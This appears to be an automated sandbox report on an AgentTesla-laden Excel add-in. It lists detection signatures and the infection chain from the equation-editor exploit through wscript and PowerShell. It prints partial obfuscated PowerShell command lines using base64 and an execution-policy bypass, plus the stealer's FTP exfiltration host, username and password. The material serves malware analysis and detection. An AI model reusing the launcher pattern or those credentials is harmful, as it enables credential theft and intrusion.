Windows
Analysis Report
transferencia interbancaria_66579.xlam.xlsx
Overview
General Information
Detection
AgentTesla
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign process
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3496 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- EQNEDT32.EXE (PID: 3700 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3840 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 3884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64-encoded script blob elided]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 3984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "[obfuscated downloader script elided]" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- AddInProcess32.exe (PID: 3136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | | |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | |
MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | |
Exploits
Author: Joe Security
System Summary
Author: Florian Roth (Nextron Systems)